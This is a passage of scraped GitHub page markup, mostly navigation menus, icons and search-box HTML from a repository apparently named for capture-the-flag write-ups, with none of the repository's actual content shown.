<svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-workflow color-fg-subtle mr-3"> <path d="M1 3a2 2 0 0 1 2-2h6.5a2 2 0 0 1 2 2v6.5a2 2 0 0 1-2 2H7v4.063C7 16.355 7.644 17 8.438 17H12.5v-2.5a2 2 0 0 1 2-2H21a2 2 0 0 1 2 2V21a2 2 0 0 1-2 2h-6.5a2 2 0 0 1-2-2v-2.5H8.437A2.939 2.939 0 0 1 5.5 15.562V11.5H3a2 2 0 0 1-2-2Zm2-.5a.5.5 0 0 0-.5.5v6.5a.5.5 0 0 0 .5.5h6.5a.5.5 0 0 0 .5-.5V3a.5.5 0 0 0-.5-.5ZM14.5 14a.5.5 0 0 0-.5.5V21a.5.5 0 0 0 .5.5H21a.5.5 0 0 0 .5-.5v-6.5a.5.5 0 0 0-.5-.5Z"></path></svg> <div> <div class="color-fg-default h4">Actions</div> Automate any workflow </div>
<svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-package color-fg-subtle mr-3"> <path d="M12.876.64V.639l8.25 4.763c.541.313.875.89.875 1.515v9.525a1.75 1.75 0 0 1-.875 1.516l-8.25 4.762a1.748 1.748 0 0 1-1.75 0l-8.25-4.763a1.75 1.75 0 0 1-.875-1.515V6.917c0-.625.334-1.202.875-1.515L11.126.64a1.748 1.748 0 0 1 1.75 0Zm-1 1.298L4.251 6.34l7.75 4.474 7.75-4.474-7.625-4.402a.248.248 0 0 0-.25 0Zm.875 19.123 7.625-4.402a.25.25 0 0 0 .125-.216V7.639l-7.75 4.474ZM3.501 7.64v8.803c0 .09.048.172.125.216l7.625 4.402v-8.947Z"></path></svg> <div> <div class="color-fg-default h4">Packages</div> Host and manage packages </div>
<svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-shield-check color-fg-subtle mr-3"> <path d="M16.53 9.78a.75.75 0 0 0-1.06-1.06L11 13.19l-1.97-1.97a.75.75 0 0 0-1.06 1.06l2.5 2.5a.75.75 0 0 0 1.06 0l5-5Z"></path><path d="m12.54.637 8.25 2.675A1.75 1.75 0 0 1 22 4.976V10c0 6.19-3.771 10.704-9.401 12.83a1.704 1.704 0 0 1-1.198 0C5.77 20.705 2 16.19 2 10V4.976c0-.758.489-1.43 1.21-1.664L11.46.637a1.748 1.748 0 0 1 1.08 0Zm-.617 1.426-8.25 2.676a.249.249 0 0 0-.173.237V10c0 5.46 3.28 9.483 8.43 11.426a.199.199 0 0 0 .14 0C17.22 19.483 20.5 15.461 20.5 10V4.976a.25.25 0 0 0-.173-.237l-8.25-2.676a.253.253 0 0 0-.154 0Z"></path></svg> <div> <div class="color-fg-default h4">Security</div> Find and fix vulnerabilities </div>
<svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-codespaces color-fg-subtle mr-3"> <path d="M3.5 3.75C3.5 2.784 4.284 2 5.25 2h13.5c.966 0 1.75.784 1.75 1.75v7.5A1.75 1.75 0 0 1 18.75 13H5.25a1.75 1.75 0 0 1-1.75-1.75Zm-2 12c0-.966.784-1.75 1.75-1.75h17.5c.966 0 1.75.784 1.75 1.75v4a1.75 1.75 0 0 1-1.75 1.75H3.25a1.75 1.75 0 0 1-1.75-1.75ZM5.25 3.5a.25.25 0 0 0-.25.25v7.5c0 .138.112.25.25.25h13.5a.25.25 0 0 0 .25-.25v-7.5a.25.25 0 0 0-.25-.25Zm-2 12a.25.25 0 0 0-.25.25v4c0 .138.112.25.25.25h17.5a.25.25 0 0 0 .25-.25v-4a.25.25 0 0 0-.25-.25Z"></path><path d="M10 17.75a.75.75 0 0 1 .75-.75h6.5a.75.75 0 0 1 0 1.5h-6.5a.75.75 0 0 1-.75-.75Zm-4 0a.75.75 0 0 1 .75-.75h.5a.75.75 0 0 1 0 1.5h-.5a.75.75 0 0 1-.75-.75Z"></path></svg> <div> <div class="color-fg-default h4">Codespaces</div> Instant dev environments </div>
<svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-copilot color-fg-subtle mr-3"> <path d="M9.75 14a.75.75 0 0 1 .75.75v2.5a.75.75 0 0 1-1.5 0v-2.5a.75.75 0 0 1 .75-.75Zm4.5 0a.75.75 0 0 1 .75.75v2.5a.75.75 0 0 1-1.5 0v-2.5a.75.75 0 0 1 .75-.75Z"></path><path d="M12 2c2.214 0 4.248.657 5.747 1.756.136.099.268.204.397.312.584.235 1.077.546 1.474.952.85.869 1.132 2.037 1.132 3.368 0 .368-.014.733-.052 1.086l.633 1.478.043.022A4.75 4.75 0 0 1 24 15.222v1.028c0 .529-.309.987-.565 1.293-.28.336-.636.653-.966.918a13.84 13.84 0 0 1-1.299.911l-.024.015-.006.004-.039.025c-.223.135-.45.264-.68.386-.46.245-1.122.571-1.941.895C16.845 21.344 14.561 22 12 22c-2.561 0-4.845-.656-6.479-1.303a19.046 19.046 0 0 1-1.942-.894 14.081 14.081 0 0 1-.535-.3l-.144-.087-.04-.025-.006-.004-.024-.015a13.16 13.16 0 0 1-1.299-.911 6.913 6.913 0 0 1-.967-.918C.31 17.237 0 16.779 0 16.25v-1.028a4.75 4.75 0 0 1 2.626-4.248l.043-.022.633-1.478a10.195 10.195 0 0 1-.052-1.086c0-1.331.282-2.498 1.132-3.368.397-.406.89-.717 1.474-.952.129-.108.261-.213.397-.312C7.752 2.657 9.786 2 12 2Zm-8 9.654v6.669a17.59 17.59 0 0 0 2.073.98C7.595 19.906 9.686 20.5 12 20.5c2.314 0 4.405-.594 5.927-1.197a17.59 17.59 0 0 0 2.073-.98v-6.669l-.038-.09c-.046.061-.095.12-.145.177-.793.9-2.057 1.259-3.782 1.259-1.59 0-2.738-.544-3.508-1.492a4.323 4.323 0 0 1-.355-.508h-.344a4.323 4.323 0 0 1-.355.508C10.704 12.456 9.555 13 7.965 13c-1.725 0-2.989-.359-3.782-1.259a3.026 3.026 0 0 1-.145-.177Zm6.309-1.092c.445-.547.708-1.334.851-2.301.057-.357.087-.718.09-1.079v-.031c-.001-.762-.166-1.26-.43-1.568l-.008-.01c-.341-.391-1.046-.689-2.533-.529-1.505.163-2.347.537-2.824 1.024-.462.473-.705 1.18-.705 2.32 0 .605.044 1.087.135 1.472.092.384.231.672.423.89.365.413 1.084.75 2.657.75.91 0 1.527-.223 1.964-.564.14-.11.268-.235.38-.374Zm2.504-2.497c.136 1.057.403 1.913.878 2.497.442.545 1.134.938 2.344.938 1.573 0 2.292-.337 2.657-.751.384-.435.558-1.151.558-2.361 0-1.14-.243-1.847-.705-2.319-.477-.488-1.318-.862-2.824-1.025-1.487-.161-2.192.139-2.533.529-.268.308-.437.808-.438 1.578v.02c.002.299.023.598.063.894Z"></path></svg> <div> <div class="color-fg-default h4">Copilot</div> Write better code with AI </div>
<svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-code-review color-fg-subtle mr-3"> <path d="M10.3 6.74a.75.75 0 0 1-.04 1.06l-2.908 2.7 2.908 2.7a.75.75 0 1 1-1.02 1.1l-3.5-3.25a.75.75 0 0 1 0-1.1l3.5-3.25a.75.75 0 0 1 1.06.04Zm3.44 1.06a.75.75 0 1 1 1.02-1.1l3.5 3.25a.75.75 0 0 1 0 1.1l-3.5 3.25a.75.75 0 1 1-1.02-1.1l2.908-2.7-2.908-2.7Z"></path><path d="M1.5 4.25c0-.966.784-1.75 1.75-1.75h17.5c.966 0 1.75.784 1.75 1.75v12.5a1.75 1.75 0 0 1-1.75 1.75h-9.69l-3.573 3.573A1.458 1.458 0 0 1 5 21.043V18.5H3.25a1.75 1.75 0 0 1-1.75-1.75ZM3.25 4a.25.25 0 0 0-.25.25v12.5c0 .138.112.25.25.25h2.5a.75.75 0 0 1 .75.75v3.19l3.72-3.72a.749.749 0 0 1 .53-.22h10a.25.25 0 0 0 .25-.25V4.25a.25.25 0 0 0-.25-.25Z"></path></svg> <div> <div class="color-fg-default h4">Code review</div> Manage code changes </div>
<svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-issue-opened color-fg-subtle mr-3"> <path d="M12 1c6.075 0 11 4.925 11 11s-4.925 11-11 11S1 18.075 1 12 5.925 1 12 1ZM2.5 12a9.5 9.5 0 0 0 9.5 9.5 9.5 9.5 0 0 0 9.5-9.5A9.5 9.5 0 0 0 12 2.5 9.5 9.5 0 0 0 2.5 12Zm9.5 2a2 2 0 1 1-.001-3.999A2 2 0 0 1 12 14Z"></path></svg> <div> <div class="color-fg-default h4">Issues</div> Plan and track work </div>
<svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-comment-discussion color-fg-subtle mr-3"> <path d="M1.75 1h12.5c.966 0 1.75.784 1.75 1.75v9.5A1.75 1.75 0 0 1 14.25 14H8.061l-2.574 2.573A1.458 1.458 0 0 1 3 15.543V14H1.75A1.75 1.75 0 0 1 0 12.25v-9.5C0 1.784.784 1 1.75 1ZM1.5 2.75v9.5c0 .138.112.25.25.25h2a.75.75 0 0 1 .75.75v2.19l2.72-2.72a.749.749 0 0 1 .53-.22h6.5a.25.25 0 0 0 .25-.25v-9.5a.25.25 0 0 0-.25-.25H1.75a.25.25 0 0 0-.25.25Z"></path><path d="M22.5 8.75a.25.25 0 0 0-.25-.25h-3.5a.75.75 0 0 1 0-1.5h3.5c.966 0 1.75.784 1.75 1.75v9.5A1.75 1.75 0 0 1 22.25 20H21v1.543a1.457 1.457 0 0 1-2.487 1.03L15.939 20H10.75A1.75 1.75 0 0 1 9 18.25v-1.465a.75.75 0 0 1 1.5 0v1.465c0 .138.112.25.25.25h5.5a.75.75 0 0 1 .53.22l2.72 2.72v-2.19a.75.75 0 0 1 .75-.75h2a.25.25 0 0 0 .25-.25v-9.5Z"></path></svg> <div> <div class="color-fg-default h4">Discussions</div> Collaborate outside of code </div>
Explore
All features
Documentation
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg>
GitHub Skills
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg>
Blog
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg>
</div>
<button type="button" class="HeaderMenu-link border-0 width-full width-lg-auto px-0 px-lg-2 py-3 py-lg-2 no-wrap d-flex flex-items-center flex-justify-between js-details-target" aria-expanded="false"> Solutions <svg opacity="0.5" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-chevron-down HeaderMenu-icon ml-1"> <path d="M12.78 5.22a.749.749 0 0 1 0 1.06l-4.25 4.25a.749.749 0 0 1-1.06 0L3.22 6.28a.749.749 0 1 1 1.06-1.06L8 8.939l3.72-3.719a.749.749 0 0 1 1.06 0Z"></path></svg> </button> <div class="HeaderMenu-dropdown dropdown-menu rounded m-0 p-0 py-2 py-lg-4 position-relative position-lg-absolute left-0 left-lg-n3 px-lg-4"> For
Enterprise
Teams
Startups
Education
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg>
By Solution
CI/CD & Automation
DevOps
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg>
DevSecOps
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg>
Case Studies
Customer Stories
Resources
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg>
</div>
<button type="button" class="HeaderMenu-link border-0 width-full width-lg-auto px-0 px-lg-2 py-3 py-lg-2 no-wrap d-flex flex-items-center flex-justify-between js-details-target" aria-expanded="false"> Open Source <svg opacity="0.5" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-chevron-down HeaderMenu-icon ml-1"> <path d="M12.78 5.22a.749.749 0 0 1 0 1.06l-4.25 4.25a.749.749 0 0 1-1.06 0L3.22 6.28a.749.749 0 1 1 1.06-1.06L8 8.939l3.72-3.719a.749.749 0 0 1 1.06 0Z"></path></svg> </button> <div class="HeaderMenu-dropdown dropdown-menu rounded m-0 p-0 py-2 py-lg-4 position-relative position-lg-absolute left-0 left-lg-n3 px-lg-4">
<div> <div class="color-fg-default h4">GitHub Sponsors</div> Fund open source developers </div>
<div> <div class="color-fg-default h4">The ReadME Project</div> GitHub community articles </div>
Repositories
Topics
Trending
Collections
</div>
Pricing
</nav>
<div class="d-lg-flex flex-items-center px-3 px-lg-0 mb-3 mb-lg-0 text-center text-lg-left"> <div class="d-lg-flex min-width-0 mb-2 mb-lg-0">
<div class="header-search flex-auto position-relative js-site-search flex-self-stretch flex-md-self-auto mb-3 mb-md-0 mr-0 mr-md-3 scoped-search site-scoped-search js-jump-to"> <div class="position-relative"> </option></form><form class="js-site-search-form" role="search" aria-label="Site" data-scope-type="Repository" data-scope-id="352459850" data-scoped-search-url="/K1nd4SUS/CTF-Writeups/search" data-owner-scoped-search-url="/orgs/K1nd4SUS/search" data-unscoped-search-url="/search" data-turbo="false" action="/K1nd4SUS/CTF-Writeups/search" accept-charset="UTF-8" method="get"> <label class="form-control header-search-wrapper input-sm p-0 js-chromeless-input-container header-search-wrapper-jump-to position-relative d-flex flex-justify-between flex-items-center"> <input type="text" class="form-control js-site-search-focus header-search-input jump-to-field js-jump-to-field js-site-search-field is-clearable" data-hotkey=s,/ name="q" placeholder="Search" data-unscoped-placeholder="Search GitHub" data-scoped-placeholder="Search" autocapitalize="off" role="combobox" aria-haspopup="listbox" aria-expanded="false" aria-autocomplete="list" aria-controls="jump-to-results" aria-label="Search" data-jump-to-suggestions-path="/_graphql/GetSuggestedNavigationDestinations" spellcheck="false" autocomplete="off" > <input type="hidden" data-csrf="true" class="js-data-jump-to-suggestions-path-csrf" value="Q+Ac2K8U2PUIriW5ZrALGflSiTPnoycQIv274KBJwdmZ8nWc8qhKQTahBXtGnpqOdWhWK9qHbAwjdzusHe+W5w==" /> <input type="hidden" class="js-site-search-type-field" name="type" > <svg xmlns="http://www.w3.org/2000/svg" width="22" height="20" aria-hidden="true" class="mr-1 header-search-key-slash"><path fill="none" stroke="#979A9C" opacity=".4" d="M3.5.5h12c1.7 0 3 1.3 3 3v13c0 1.7-1.3 3-3 3h-12c-1.7 0-3-1.3-3-3v-13c0-1.7 1.3-3 3-3z"></path><path fill="#979A9C" d="M11.8 6L8 15.1h-.9L10.8 6h1z"></path></svg>
<div class="Box position-absolute overflow-hidden d-none jump-to-suggestions js-jump-to-suggestions-container">
<div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path d="M2 2.5A2.5 2.5 0 0 1 4.5 0h8.75a.75.75 0 0 1 .75.75v12.5a.75.75 0 0 1-.75.75h-2.5a.75.75 0 0 1 0-1.5h1.75v-2h-8a1 1 0 0 0-.714 1.7.75.75 0 1 1-1.072 1.05A2.495 2.495 0 0 1 2 11.5Zm10.5-1h-8a1 1 0 0 0-1 1v6.708A2.486 2.486 0 0 1 4.5 9h8ZM5 12.25a.25.25 0 0 1 .25-.25h3.5a.25.25 0 0 1 .25.25v3.25a.25.25 0 0 1-.4.2l-1.45-1.087a.249.249 0 0 0-.3 0L5.4 15.7a.25.25 0 0 1-.4-.2Z"></path></svg> <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path d="M1.75 0h12.5C15.216 0 16 .784 16 1.75v12.5A1.75 1.75 0 0 1 14.25 16H1.75A1.75 1.75 0 0 1 0 14.25V1.75C0 .784.784 0 1.75 0ZM1.5 1.75v12.5c0 .138.112.25.25.25h12.5a.25.25 0 0 0 .25-.25V1.75a.25.25 0 0 0-.25-.25H1.75a.25.25 0 0 0-.25.25ZM11.75 3a.75.75 0 0 1 .75.75v7.5a.75.75 0 0 1-1.5 0v-7.5a.75.75 0 0 1 .75-.75Zm-8.25.75a.75.75 0 0 1 1.5 0v5.5a.75.75 0 0 1-1.5 0ZM8 3a.75.75 0 0 1 .75.75v3.5a.75.75 0 0 1-1.5 0v-3.5A.75.75 0 0 1 8 3Z"></path></svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path d="M10.68 11.74a6 6 0 0 1-7.922-8.982 6 6 0 0 1 8.982 7.922l3.04 3.04a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215ZM11.5 7a4.499 4.499 0 1 0-8.997 0A4.499 4.499 0 0 0 11.5 7Z"></path></svg> </div>
<div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target"> </div>
<div class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none js-jump-to-badge-search"> <span> In this repository </span> <span> All GitHub </span> <span>↵</span> </div>
<div aria-hidden="true" class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span>↵</span> </div>
<span>No suggested jump to results</span>
<div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path d="M2 2.5A2.5 2.5 0 0 1 4.5 0h8.75a.75.75 0 0 1 .75.75v12.5a.75.75 0 0 1-.75.75h-2.5a.75.75 0 0 1 0-1.5h1.75v-2h-8a1 1 0 0 0-.714 1.7.75.75 0 1 1-1.072 1.05A2.495 2.495 0 0 1 2 11.5Zm10.5-1h-8a1 1 0 0 0-1 1v6.708A2.486 2.486 0 0 1 4.5 9h8ZM5 12.25a.25.25 0 0 1 .25-.25h3.5a.25.25 0 0 1 .25.25v3.25a.25.25 0 0 1-.4.2l-1.45-1.087a.249.249 0 0 0-.3 0L5.4 15.7a.25.25 0 0 1-.4-.2Z"></path></svg> <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path d="M1.75 0h12.5C15.216 0 16 .784 16 1.75v12.5A1.75 1.75 0 0 1 14.25 16H1.75A1.75 1.75 0 0 1 0 14.25V1.75C0 .784.784 0 1.75 0ZM1.5 1.75v12.5c0 .138.112.25.25.25h12.5a.25.25 0 0 0 .25-.25V1.75a.25.25 0 0 0-.25-.25H1.75a.25.25 0 0 0-.25.25ZM11.75 3a.75.75 0 0 1 .75.75v7.5a.75.75 0 0 1-1.5 0v-7.5a.75.75 0 0 1 .75-.75Zm-8.25.75a.75.75 0 0 1 1.5 0v5.5a.75.75 0 0 1-1.5 0ZM8 3a.75.75 0 0 1 .75.75v3.5a.75.75 0 0 1-1.5 0v-3.5A.75.75 0 0 1 8 3Z"></path></svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path d="M10.68 11.74a6 6 0 0 1-7.922-8.982 6 6 0 0 1 8.982 7.922l3.04 3.04a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215ZM11.5 7a4.499 4.499 0 1 0-8.997 0A4.499 4.499 0 0 0 11.5 7Z"></path></svg> </div>
<div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target"> </div>
<div class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none js-jump-to-badge-search"> <span> In this repository </span> <span> All GitHub </span> <span>↵</span> </div>
<div aria-hidden="true" class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span>↵</span> </div>
<div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path d="M2 2.5A2.5 2.5 0 0 1 4.5 0h8.75a.75.75 0 0 1 .75.75v12.5a.75.75 0 0 1-.75.75h-2.5a.75.75 0 0 1 0-1.5h1.75v-2h-8a1 1 0 0 0-.714 1.7.75.75 0 1 1-1.072 1.05A2.495 2.495 0 0 1 2 11.5Zm10.5-1h-8a1 1 0 0 0-1 1v6.708A2.486 2.486 0 0 1 4.5 9h8ZM5 12.25a.25.25 0 0 1 .25-.25h3.5a.25.25 0 0 1 .25.25v3.25a.25.25 0 0 1-.4.2l-1.45-1.087a.249.249 0 0 0-.3 0L5.4 15.7a.25.25 0 0 1-.4-.2Z"></path></svg> <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path d="M1.75 0h12.5C15.216 0 16 .784 16 1.75v12.5A1.75 1.75 0 0 1 14.25 16H1.75A1.75 1.75 0 0 1 0 14.25V1.75C0 .784.784 0 1.75 0ZM1.5 1.75v12.5c0 .138.112.25.25.25h12.5a.25.25 0 0 0 .25-.25V1.75a.25.25 0 0 0-.25-.25H1.75a.25.25 0 0 0-.25.25ZM11.75 3a.75.75 0 0 1 .75.75v7.5a.75.75 0 0 1-1.5 0v-7.5a.75.75 0 0 1 .75-.75Zm-8.25.75a.75.75 0 0 1 1.5 0v5.5a.75.75 0 0 1-1.5 0ZM8 3a.75.75 0 0 1 .75.75v3.5a.75.75 0 0 1-1.5 0v-3.5A.75.75 0 0 1 8 3Z"></path></svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path d="M10.68 11.74a6 6 0 0 1-7.922-8.982 6 6 0 0 1 8.982 7.922l3.04 3.04a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215ZM11.5 7a4.499 4.499 0 1 0-8.997 0A4.499 4.499 0 0 0 11.5 7Z"></path></svg> </div>
<div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target"> </div>
<div class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none js-jump-to-badge-search"> <span> In this organization </span> <span> All GitHub </span> <span>↵</span> </div>
<div aria-hidden="true" class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span>↵</span> </div>
<div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path d="M2 2.5A2.5 2.5 0 0 1 4.5 0h8.75a.75.75 0 0 1 .75.75v12.5a.75.75 0 0 1-.75.75h-2.5a.75.75 0 0 1 0-1.5h1.75v-2h-8a1 1 0 0 0-.714 1.7.75.75 0 1 1-1.072 1.05A2.495 2.495 0 0 1 2 11.5Zm10.5-1h-8a1 1 0 0 0-1 1v6.708A2.486 2.486 0 0 1 4.5 9h8ZM5 12.25a.25.25 0 0 1 .25-.25h3.5a.25.25 0 0 1 .25.25v3.25a.25.25 0 0 1-.4.2l-1.45-1.087a.249.249 0 0 0-.3 0L5.4 15.7a.25.25 0 0 1-.4-.2Z"></path></svg> <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path d="M1.75 0h12.5C15.216 0 16 .784 16 1.75v12.5A1.75 1.75 0 0 1 14.25 16H1.75A1.75 1.75 0 0 1 0 14.25V1.75C0 .784.784 0 1.75 0ZM1.5 1.75v12.5c0 .138.112.25.25.25h12.5a.25.25 0 0 0 .25-.25V1.75a.25.25 0 0 0-.25-.25H1.75a.25.25 0 0 